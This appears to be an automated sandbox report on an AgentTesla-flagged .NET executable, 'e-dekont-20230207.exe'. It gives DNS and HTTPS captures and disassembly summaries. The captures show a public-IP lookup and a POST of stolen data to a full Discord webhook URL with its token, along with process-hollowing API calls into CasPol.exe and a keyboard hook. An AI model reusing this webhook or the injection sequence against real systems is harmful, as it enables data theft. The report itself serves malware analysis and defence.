                                                            Feb 7, 2023 18:31:28.980236053 CET8.8.8.8192.168.2.50x96d5No error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                            Feb 7, 2023 18:31:33.850213051 CET8.8.8.8192.168.2.50x3a38No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • api.ipify.org
                                                            • discord.com

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.54968964.185.227.155443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2023-02-07 17:31:29 UTC0OUTGET / HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: api.ipify.org
                                                            Connection: Keep-Alive
                                                            2023-02-07 17:31:29 UTC0INHTTP/1.1 200 OK
                                                            Content-Length: 11
                                                            Content-Type: text/plain
                                                            Date: Tue, 07 Feb 2023 17:31:29 GMT
                                                            Vary: Origin
                                                            Connection: close
                                                            2023-02-07 17:31:29 UTC0INData Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
                                                            Data Ascii: 84.17.52.13


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.549690162.159.128.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2023-02-07 17:31:33 UTC0OUTPOST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----------0d40611c92ae4655a6dec63fbd8447e1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                            Host: discord.com
                                                            Content-Length: 1224
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            2023-02-07 17:31:33 UTC0INHTTP/1.1 100 Continue
                                                            2023-02-07 17:31:33 UTC0OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 64 34 30 36 31 31 63 39 32 61 65 34 36 35 35 61 36 64 65 63 36 33 66 62 64 38 34 34 37 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 6e 61 6d 65 22 0d 0a 0d 0a 61 6c 66 6f 6e 73 2d 39 32 38 31 30 30 20 32 30 32 33 2d 30 32 2d 30 38 20 30 31 2d 33 31 2d 30 30 2e 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 64 34 30 36 31 31 63 39 32 61 65 34 36 35 35 61 36 64 65 63 36 33 66 62 64 38 34 34 37 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 66 6f 72 6d 61 74 22 0d 0a 0d 0a 68 74 6d 6c 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30
                                                            Data Ascii: ------------0d40611c92ae4655a6dec63fbd8447e1Content-Disposition: form-data; name="filename"user-928100 2023-02-08 01-31-00.html------------0d40611c92ae4655a6dec63fbd8447e1Content-Disposition: form-data; name="fileformat"html------------0
                                                            2023-02-07 17:31:34 UTC1INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Feb 2023 17:31:34 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 45
                                                            Connection: close
                                                            set-cookie: __dcfduid=444c6840a70d11ed8760e6ba40672d66; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Egxqsltc4qolLS4uzBaoE9%2FLaswRMsv8abKbQSPxREWUfQSPaTwB7kb7z0WOBsXz71TuPG8StdDXxsdUAHgNvhn4re6poX%2Bxo7O3WpOD0mQMHdrmzCmF8EGKAI5p"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Set-Cookie: __sdcfduid=444c6840a70d11ed8760e6ba40672d66dd69c8ba71cb11fcdcb8dbf0ca98829aacc0c779c3c769b75f558a3581eb9a0f; Expires=Sun, 06-Feb-2028 17:31:34 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
                                                            Set-Cookie: __cfruid=e3626c59acba08201b37fef2fc963ccf5c710641-1675791094; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                            Server: cloudflare
                                                            CF-RAY: 795ddc215dd0368a-FRA
                                                            {"message": "Unknown Webhook", "code": 10015}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:18:31:24
                                                            Start date:07/02/2023
                                                            Path:C:\Users\user\Desktop\e-dekont-20230207.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Users\user\Desktop\e-dekont-20230207.exe
                                                            Imagebase:0xfc0000
                                                            File size:688128 bytes
                                                            MD5 hash:2FBAA4D917CCE04617F24F87309286D6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Reputation:low

                                                            General

                                                            Target ID:1
                                                            Start time:18:31:26
                                                            Start date:07/02/2023
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
                                                            Imagebase:0x5e0000
                                                            File size:107624 bytes
                                                            MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.575420221.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:10.1%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:18
                                                              Total number of Limit Nodes:0

                                                              Executed Functions

                                                              Function 00007FF9A75A9609 Relevance: 1.9, APIs: 1, Instructions: 371processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 35dfe7268f080f631b4b0353ab09e527e3b20b8db83fec5324ae8acbeda03818
                                                              • Instruction ID: f87894eb999e9fd21fc41951c2da75a8239b103cfe441a5626ade1ba0d529c53
                                                              • Opcode Fuzzy Hash: 35dfe7268f080f631b4b0353ab09e527e3b20b8db83fec5324ae8acbeda03818
                                                              • Instruction Fuzzy Hash: 25C11570908A1D8FDB98DF18C899BE9B7F1FB69311F0011AAD00EE3251DB75AA84CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF9A75A9F7D Relevance: 1.7, APIs: 1, Instructions: 213injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 219 7ff9a75a9f7d-7ff9a75a9f89 220 7ff9a75a9f94-7ff9a75aa041 219->220 221 7ff9a75a9f8b-7ff9a75a9f93 219->221 224 7ff9a75aa043-7ff9a75aa066 220->224 225 7ff9a75aa069-7ff9a75aa102 WriteProcessMemory 220->225 221->220 224->225 226 7ff9a75aa104 225->226 227 7ff9a75aa10a-7ff9a75aa166 225->227 226->227
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: eb0bcd48c6ec3466e1019a0a845fec69474ca42c5d5575ec4b63a14173b45a1b
                                                              • Instruction ID: db12cba0c2605138e4a07f4bd9332bdffeeb807716ded5c1b100cf1fdf670877
                                                              • Opcode Fuzzy Hash: eb0bcd48c6ec3466e1019a0a845fec69474ca42c5d5575ec4b63a14173b45a1b
                                                              • Instruction Fuzzy Hash: 89612270908A5D8FDB98DF68C885BE9BBF1FB69310F1041AED04DE3291DB74A985CB41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF9A75A9C25 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 229 7ff9a75a9c25-7ff9a75a9c31 230 7ff9a75a9c33-7ff9a75a9c3b 229->230 231 7ff9a75a9c3c-7ff9a75a9d7d ReadProcessMemory 229->231 230->231 234 7ff9a75a9d85-7ff9a75a9ddb 231->234 235 7ff9a75a9d7f 231->235 235->234
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 6479388db53a7b35fe4605e9b835ff39ca54b3f62ebcdb0de10070da448d6e99
                                                              • Instruction ID: d22a5a23ace6b8e0fd2e995a4003cba7752f04dabf5722b3817633ce5189f0df
                                                              • Opcode Fuzzy Hash: 6479388db53a7b35fe4605e9b835ff39ca54b3f62ebcdb0de10070da448d6e99
                                                              • Instruction Fuzzy Hash: 4A513170908A5C8FDB98DF58C885BE9BBF1FB6A310F1091AED04DE3241DA70A985CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF9A75A9DDD Relevance: 1.7, APIs: 1, Instructions: 181memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 237 7ff9a75a9ddd-7ff9a75a9de9 238 7ff9a75a9df4-7ff9a75a9f27 VirtualAllocEx 237->238 239 7ff9a75a9deb-7ff9a75a9df3 237->239 242 7ff9a75a9f29 238->242 243 7ff9a75a9f2f-7ff9a75a9f7b 238->243 239->238 242->243
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 9016393323866061a8f1f73b3bea1316ef428c6b3f1e95c5706dba3b1f747510
                                                              • Instruction ID: 08348a95edc1d557282138940e629e72e3890e31f40e150c9a03bfc690f0db95
                                                              • Opcode Fuzzy Hash: 9016393323866061a8f1f73b3bea1316ef428c6b3f1e95c5706dba3b1f747510
                                                              • Instruction Fuzzy Hash: B3514630908A5D8FDB98DF58C884BE9BBB1FB6A315F1051AED04DE7241DB70A885CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF9A75A9AA9 Relevance: 1.7, APIs: 1, Instructions: 168threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 245 7ff9a75a9aa9-7ff9a75a9b44 248 7ff9a75a9b66-7ff9a75a9bcf Wow64SetThreadContext 245->248 249 7ff9a75a9b46-7ff9a75a9b63 245->249 250 7ff9a75a9bd1 248->250 251 7ff9a75a9bd7-7ff9a75a9c21 248->251 249->248 250->251
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 0d53d37a695191cb590ccc4b73df0d4e81da8e2117cff013cec69ecf176ac5d2
                                                              • Instruction ID: eb1a2e5995ed30aa0a77c8ba608120e4ec16a160a7ccecd72e4541ddf330d3b7
                                                              • Opcode Fuzzy Hash: 0d53d37a695191cb590ccc4b73df0d4e81da8e2117cff013cec69ecf176ac5d2
                                                              • Instruction Fuzzy Hash: 24514970D08A5C8FDB94DF98C889BE9BBF1FBA9311F1082AAD048D7255D7749885CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FF9A75AA289 Relevance: 1.6, APIs: 1, Instructions: 128threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 253 7ff9a75aa289-7ff9a75aa35a ResumeThread 256 7ff9a75aa362-7ff9a75aa3a0 253->256 257 7ff9a75aa35c 253->257 257->256
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.307821721.00007FF9A75A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A75A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff9a75a0000_e-dekont-20230207.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: a95a0f0e31bf9a4dfb27992db916759fc1dfae009e0317d40c483739fb93dfea
                                                              • Instruction ID: 4fbc2bfad27057c88379aaebef9aa124aec76ef71cec6308e7e06300d1fdbb96
                                                              • Opcode Fuzzy Hash: a95a0f0e31bf9a4dfb27992db916759fc1dfae009e0317d40c483739fb93dfea
                                                              • Instruction Fuzzy Hash: 32415A70D08A4C8FDB98DF98D885BADBBB0FB5A310F1051AED049E7252DA71A885CF41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:13.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:1%
                                                              Total number of Nodes:293
                                                              Total number of Limit Nodes:27
                                                              execution_graph 37619 4da0448 37620 4da044d 37619->37620 37621 4da048f 37620->37621 37624 64d5020 37620->37624 37628 64d5012 37620->37628 37625 64d502f 37624->37625 37632 64d4c0c 37625->37632 37629 64d502f 37628->37629 37630 64d4c0c 4 API calls 37629->37630 37631 64d504f 37630->37631 37631->37620 37633 64d4c17 37632->37633 37636 64d4ca8 37633->37636 37635 64d5126 37635->37635 37637 64d4cb3 37636->37637 37638 64d582d 37637->37638 37640 64d70e0 37637->37640 37638->37635 37641 64d7101 37640->37641 37642 64d7125 37641->37642 37645 64d7281 37641->37645 37649 64d7290 37641->37649 37642->37638 37646 64d7290 37645->37646 37647 64d72d6 37646->37647 37653 64d53d4 37646->37653 37647->37642 37650 64d729d 37649->37650 37651 64d72d6 37650->37651 37652 64d53d4 4 API calls 37650->37652 37651->37642 37652->37651 37654 64d53df 37653->37654 37656 64d7348 37654->37656 37657 64d5408 37654->37657 37656->37656 37658 64d5413 37657->37658 37664 64d5418 37658->37664 37660 64d73b7 37668 64dc558 37660->37668 37677 64dc548 37660->37677 37661 64d73f0 37661->37656 37665 64d5423 37664->37665 37666 64d7e0c 37665->37666 37667 64d70e0 4 API calls 37665->37667 37666->37660 37667->37666 37670 64dc589 37668->37670 37671 64dc67a 37668->37671 37669 64dc595 37669->37661 37670->37669 37672 64dc5d5 37670->37672 37685 64dc7b1 37670->37685 37689 64dc7c0 37670->37689 37671->37661 37692 63701a0 37672->37692 37696 6370190 37672->37696 37679 64dc556 37677->37679 37680 64dc5d5 37677->37680 37678 64dc595 37678->37661 37679->37678 37679->37680 37681 64dc7b1 3 API calls 37679->37681 37682 64dc7c0 3 API calls 37679->37682 37683 63701a0 CreateWindowExW 37680->37683 37684 6370190 CreateWindowExW 37680->37684 37681->37680 37682->37680 37683->37678 37684->37678 37686 64dc7c0 37685->37686 37700 64dc7f0 37686->37700 37687 64dc7ca 37687->37672 37691 64dc7f0 3 API calls 37689->37691 37690 64dc7ca 37690->37672 37691->37690 37693 63701c2 37692->37693 37694 63702cb 37693->37694 37709 6372145 37693->37709 37694->37671 37697 637019b 37696->37697 37698 63702cb 37697->37698 37699 6372145 CreateWindowExW 37697->37699 37698->37671 37699->37698 37702 64dc7fa 37700->37702 37701 64dc8b9 37701->37687 37702->37701 37705 6371170 GetModuleHandleW 37702->37705 37706 637116a GetModuleHandleW 37702->37706 37703 64dc8f3 37704 64dc903 37703->37704 37707 64dcb28 LoadLibraryExW 37703->37707 37708 64dcb38 LoadLibraryExW 37703->37708 37704->37687 37705->37703 37706->37703 37707->37704 37708->37704 37710 637214e CreateWindowExW 37709->37710 37711 63720e1 37709->37711 37713 6372274 37710->37713 37711->37694 37713->37713 37714 64d2158 37715 64d219c SetWindowsHookExA 37714->37715 37717 64d21e2 37715->37717 37874 687e5e0 37875 687e626 GlobalMemoryStatusEx 37874->37875 37876 687e656 37875->37876 37888 6370140 37889 6370156 37888->37889 37891 63701a0 CreateWindowExW 37889->37891 37892 6370190 CreateWindowExW 37889->37892 37890 637018a 37891->37890 37892->37890 37877 4da59f0 37878 4da5a0e 37877->37878 37881 4da487c 37878->37881 37880 4da5a45 37883 4da7510 LoadLibraryA 37881->37883 37884 4da7609 37883->37884 37718 ecd030 37720 ecd048 37718->37720 37719 ecd0a2 37720->37719 37725 637b192 37720->37725 37736 637274c 37720->37736 37747 6372900 37720->37747 37751 63728f1 37720->37751 37727 637b1a0 37725->37727 37726 637b201 37785 6374bec 37726->37785 37727->37726 37730 637b1f1 37727->37730 37729 637b1ff 37755 64dd578 37730->37755 37760 637b318 37730->37760 37768 637b328 37730->37768 37775 64dd520 37730->37775 37780 64dd588 37730->37780 37738 6372757 37736->37738 37737 637b201 37739 6374bec 3 API calls 37737->37739 37738->37737 37740 637b1f1 37738->37740 37741 637b1ff 37739->37741 37742 64dd578 3 API calls 37740->37742 37743 64dd588 3 API calls 37740->37743 37744 64dd520 3 API calls 37740->37744 37745 637b328 3 API calls 37740->37745 37746 637b318 3 API calls 37740->37746 37741->37741 37742->37741 37743->37741 37744->37741 37745->37741 37746->37741 37748 6372926 37747->37748 37749 637274c 3 API calls 37748->37749 37750 6372947 37749->37750 37750->37719 37754 6372900 37751->37754 37752 637274c 3 API calls 37753 6372947 37752->37753 37753->37719 37754->37752 37757 64dd57b 37755->37757 37756 64dd628 37756->37729 37792 64dd640 37757->37792 37796 64dd630 37757->37796 37761 637b322 37760->37761 37762 637b2fc 37760->37762 37763 6374bec 3 API calls 37761->37763 37764 637b412 37761->37764 37821 637dee3 37761->37821 37825 637bec8 37761->37825 37829 637def8 37761->37829 37762->37729 37763->37761 37764->37729 37770 637b336 37768->37770 37769 6374bec 3 API calls 37769->37770 37770->37769 37771 637b412 37770->37771 37772 637dee3 OleInitialize 37770->37772 37773 637def8 OleInitialize 37770->37773 37774 637bec8 OleInitialize 37770->37774 37771->37729 37772->37770 37773->37770 37774->37770 37777 64dd523 37775->37777 37776 64dd628 37776->37729 37777->37729 37778 64dd640 3 API calls 37777->37778 37779 64dd630 3 API calls 37777->37779 37778->37776 37779->37776 37782 64dd589 37780->37782 37781 64dd628 37781->37729 37783 64dd640 3 API calls 37782->37783 37784 64dd630 3 API calls 37782->37784 37783->37781 37784->37781 37786 6374bf7 37785->37786 37787 637b514 37786->37787 37788 637b46a 37786->37788 37789 637274c 2 API calls 37787->37789 37790 637b4c2 CallWindowProcW 37788->37790 37791 637b471 37788->37791 37789->37791 37790->37791 37791->37729 37793 64dd651 37792->37793 37801 64de856 37792->37801 37808 64de860 37792->37808 37793->37756 37797 64dd640 37796->37797 37798 64dd651 37797->37798 37799 64de856 3 API calls 37797->37799 37800 64de860 3 API calls 37797->37800 37798->37756 37799->37798 37800->37798 37802 64de85d 37801->37802 37803 64de859 37801->37803 37805 64de8bb 37802->37805 37806 6374bec 3 API calls 37802->37806 37814 637b418 37802->37814 37803->37793 37804 64de87a 37804->37793 37805->37793 37806->37804 37809 64de86f 37808->37809 37811 64de8bb 37808->37811 37812 6374bec 3 API calls 37809->37812 37813 637b418 3 API calls 37809->37813 37810 64de87a 37810->37793 37811->37793 37812->37810 37813->37810 37815 637b428 37814->37815 37816 637b514 37815->37816 37817 637b46a 37815->37817 37818 637274c 2 API calls 37816->37818 37819 637b4c2 CallWindowProcW 37817->37819 37820 637b471 37817->37820 37818->37820 37819->37820 37820->37804 37822 637def8 37821->37822 37823 637e055 37822->37823 37833 637e4a7 37822->37833 37823->37761 37827 637bef8 37825->37827 37826 637debe 37826->37761 37827->37826 37828 637e4a7 OleInitialize 37827->37828 37828->37827 37830 637df17 37829->37830 37831 637e055 37830->37831 37832 637e4a7 OleInitialize 37830->37832 37831->37761 37832->37830 37834 637e4bd 37833->37834 37835 637e50c 37834->37835 37839 637e538 37834->37839 37849 637e528 37834->37849 37835->37822 37836 637e521 37836->37822 37840 637e54a 37839->37840 37841 637e565 37840->37841 37843 637e5a9 37840->37843 37845 637e538 OleInitialize 37841->37845 37846 637e528 OleInitialize 37841->37846 37842 637e56b 37842->37836 37859 637e718 37843->37859 37863 637e708 37843->37863 37844 637e625 37844->37836 37845->37842 37846->37842 37850 637e538 37849->37850 37851 637e565 37850->37851 37853 637e5a9 37850->37853 37857 637e538 OleInitialize 37851->37857 37858 637e528 OleInitialize 37851->37858 37852 637e56b 37852->37836 37855 637e718 OleInitialize 37853->37855 37856 637e708 OleInitialize 37853->37856 37854 637e625 37854->37836 37855->37854 37856->37854 37857->37852 37858->37852 37860 637e720 37859->37860 37867 637e1bc 37860->37867 37864 637e718 37863->37864 37865 637e1bc OleInitialize 37864->37865 37866 637e729 37865->37866 37866->37844 37868 637e1c7 37867->37868 37870 637e729 37868->37870 37871 637e1cc 37868->37871 37870->37844 37872 637e790 OleInitialize 37871->37872 37873 637e7f4 37872->37873 37873->37870 37885 637ea18 37886 637ea72 OleGetClipboard 37885->37886 37887 637eab2 37886->37887 37893 6374e08 GetCurrentProcess 37894 6374e82 GetCurrentThread 37893->37894 37895 6374e7b 37893->37895 37896 6374ebf GetCurrentProcess 37894->37896 37897 6374eb8 37894->37897 37895->37894 37898 6374ef5 37896->37898 37897->37896 37903 6375f10 37898->37903 37905 637720c 37898->37905 37910 63772b0 37898->37910 37915 63774d1 37898->37915 37899 6374f1d GetCurrentThreadId 37900 6374f4e 37899->37900 37903->37899 37906 63771b9 37905->37906 37906->37905 37907 6377500 37906->37907 37920 637bac7 37906->37920 37924 637bad8 37906->37924 37907->37899 37912 63771b9 37910->37912 37911 6377500 37911->37899 37912->37911 37913 637bac7 KiUserCallbackDispatcher 37912->37913 37914 637bad8 KiUserCallbackDispatcher 37912->37914 37913->37912 37914->37912 37917 63771b9 37915->37917 37916 6377500 37916->37899 37917->37916 37918 637bac7 KiUserCallbackDispatcher 37917->37918 37919 637bad8 KiUserCallbackDispatcher 37917->37919 37918->37917 37919->37917 37923 637bace 37920->37923 37922 637baf7 37922->37906 37923->37922 37928 6374c44 37923->37928 37927 637baf2 37924->37927 37925 637baf7 37925->37906 37926 6374c44 KiUserCallbackDispatcher 37926->37927 37927->37925 37927->37926 37929 637be38 KiUserCallbackDispatcher 37928->37929 37931 637bea6 37929->37931 37931->37923 37932 687e4f8 37933 687e515 37932->37933 37934 687e53d 37932->37934 37935 687e626 GlobalMemoryStatusEx 37934->37935 37936 687e55e 37934->37936 37937 687e656 37935->37937 37938 6372308 37939 637230d 37938->37939 37940 637232b 37939->37940 37942 637232f 37939->37942 37943 6372356 37942->37943 37944 6372407 37943->37944 37947 6372d89 37943->37947 37953 6372d98 37943->37953 37944->37939 37948 6372d30 37947->37948 37949 6372d92 37947->37949 37950 637369e 37949->37950 37958 6376b60 37949->37958 37962 6376c13 37949->37962 37950->37943 37954 6372db0 37953->37954 37955 637369e 37954->37955 37956 6376c13 KiUserCallbackDispatcher 37954->37956 37957 6376b60 KiUserCallbackDispatcher 37954->37957 37955->37943 37956->37954 37957->37954 37960 6376b8d 37958->37960 37959 6376c29 37960->37959 37966 6377078 37960->37966 37963 6376be8 37962->37963 37964 6376c29 37963->37964 37965 6377078 KiUserCallbackDispatcher 37963->37965 37965->37963 37967 6377092 37966->37967 37968 637715b 37967->37968 37969 63774d1 KiUserCallbackDispatcher 37967->37969 37970 63772b0 KiUserCallbackDispatcher 37967->37970 37971 637720c KiUserCallbackDispatcher 37967->37971 37969->37967 37970->37967 37971->37967 37972 6375f88 DuplicateHandle 37973 637601e 37972->37973

                                                              Executed Functions

                                                              Function 063701A0 Relevance: 2.8, Strings: 2, Instructions: 349COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.578260337.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6370000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: a${.m^
                                                              • API String ID: 0-3244929877
                                                              • Opcode ID: 14b9819b8cb49def74723031fe3dd307818d028fe17301a5281a39a73d886bdd
                                                              • Instruction ID: ed4109a4fef83070a640c874ea8392f1e0062f9aef1abddb792241baffea5a8a
                                                              • Opcode Fuzzy Hash: 14b9819b8cb49def74723031fe3dd307818d028fe17301a5281a39a73d886bdd
                                                              • Instruction Fuzzy Hash: 9DD16D74A00259DFDB05EFB4D8559AEBBB2FF88304F108429E406AB354DF39A946CF94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04DAC898 Relevance: 2.8, Strings: 2, Instructions: 338COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh$xh
                                                              • API String ID: 0-1680090540
                                                              • Opcode ID: f547fa8e968fe9c25fabb22e9f1b00a1a1c29dfb0354818a112d59b04e90f52a
                                                              • Instruction ID: 428bea60984efe10464ce24828d4d91b3ad320d5d63ecc541b66e5157a12e99e
                                                              • Opcode Fuzzy Hash: f547fa8e968fe9c25fabb22e9f1b00a1a1c29dfb0354818a112d59b04e90f52a
                                                              • Instruction Fuzzy Hash: FBD14A71E10209DFCB14DFA8D484AAEBBF2FF88724F14855AE415AB351DB34E946CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04DAA008 Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.577030143.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_4da0000_CasPol.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xh$xh
                                                              • API String ID: 0-1680090540
                                                              • Opcode ID: 82c3ce7e3c8e858eb2746e520c0b3cff0bb4adc8af56c56fc91747dc584ff848
                                                              • Instruction ID: 87eb9bbfb23e84c4c913f107c81c5c57cdd0a667d064f97b3402c48496e2d0db
